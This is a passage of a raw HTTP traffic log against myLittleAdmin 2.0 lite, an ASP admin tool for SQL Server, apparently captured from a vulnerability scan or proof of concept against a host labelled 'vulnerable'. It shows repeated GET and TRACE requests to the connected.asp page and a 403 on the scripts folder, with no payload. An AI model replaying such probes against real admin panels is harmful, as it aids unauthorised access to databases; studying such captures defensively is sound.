<TD><INPUT TYPE="text" NAME="mla_conn_datasource" CLASS="alphanumeric" TITLE="Data Source"></TD>
<TD CLASS="formlabel">Port :</TD>
<TD><INPUT TYPE="text" NAME="mla_conn_portnumber" CLASS="numeric" TITLE="Port"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Initial Catalog :</TD>
<TD COLSPAN=3><INPUT TYPE="text" NAME="mla_conn_initialcatalog" CLASS="alphanumeric" TITLE="Initial Catalog"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Provider :</TD>
<TD COLSPAN=3>
<INPUT TYPE="radio" NAME="mla_conn_provider" VALUE="SQLOLEDB" ID="mla_conn_provider_1" CHECKED><LABEL FOR="mla_conn_provider_1">SQLOLEDB</LABEL> &nbsp;
<INPUT TYPE="radio" NAME="mla_conn_provider" VALUE="ODBC" ID="mla_conn_provider_2"><LABEL FOR="mla_conn_provider_2">ODBC</LABEL>
</TD>
</TR>
<TR>
<TD CLASS="formlabel">Network Library :</TD>
<TD>
<SELECT NAME="mla_conn_networklibrary">
<OPTION VALUE="">Default</OPTION>
<OPTION VALUE="dbnmpntw">Named Pipes</OPTION>
<OPTION VALUE="dbmssocn">Winsock TCP/IP</OPTION>
<OPTION VALUE="dbmsspxn">SPX/IPX</OPTION>
<OPTION VALUE="dbmsvinn">Banyan Vines</OPTION>
<OPTION VALUE="dbmsrpcn">Multi-Protocol (RPC)</OPTION>
</SELECT>
</TD>
<TD CLASS="formlabel">Trusted :</TD>
<TD><INPUT TYPE="checkbox" NAME="mla_conn_trusted"></TD>
</TR>
<TR>
<TD CLASS="formlabel">User Name :</TD>
<TD COLSPAN=3><INPUT TYPE="text" NAME="mla_conn_user" CLASS="alphanumeric" TITLE="User Name"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Password :</TD>
<TD COLSPAN=3><INPUT TYPE="password" NAME="mla_conn_password" CLASS="alphanumeric" TITLE="Password"></TD>
</TR>
<TR><TD COLSPAN=4>&nbsp;</TD></TR>
<TR>
<TD COLSPAN=3 CLASS="formlabel">Save this information into a cookie :</TD><TD><INPUT TYPE="checkbox" NAME="mla_conn_cookie"></TD>
</TR>
<TR><TD COLSPAN=4>&nbsp;</TD></TR>
<TR>
<TD COLSPAN=4 ALIGN=CENTER>
<INPUT TYPE="reset" VALUE="Reset" NAME="mla_conn_reset"> &nbsp;
<INPUT TYPE="submit" VALUE="Connect" NAME="mla_conn_submit">
</TD>
</TR>
</TABLE>
</FORM>

<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
document.mla_conn.mla_conn_datasource.value = "";
document.mla_conn.mla_conn_portnumber.value = "";
setRadioValue(document.mla_conn.mla_conn_provider, "", "");
setSelectValue(document.mla_conn.mla_conn_networklibrary, "", "");
document.mla_conn.mla_conn_initialcatalog.value = "";
document.mla_conn.mla_conn_trusted.checked = false;
document.mla_conn.mla_conn_user.value = "";
document.mla_conn.mla_conn_password.value = "";

if (window.parent.frames['Tree']) window.parent.frames['Tree'].oTree.expandNode('M1');
//-->
</SCRIPT>

</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:45:54 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQATCTSCC=BCHDKDPDAFJENELKKEICLIIC; path=/
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:53 GMT
Content-Length: 1519


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>

</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

TRACE /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Length: 3999
Content-Type: text/html; Charset=iso-8859-1
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:45:54 AM
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQATCTSCC=DCHDKDPDFNKIEINKNMKFBOPO; path=/
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:53 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>

</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/ HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:53 GMT
Content-Length: 1233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:45:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQATCTSCC=FCHDKDPDPDKEHNJBOMPFNNGP; path=/
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:54 GMT
Content-Length: 1519


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>

</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:45:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQATCTSCC=FCHDKDPDPDKEHNJBOMPFNNGP; path=/
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:54 GMT
Content-Length: 1519


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>

</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>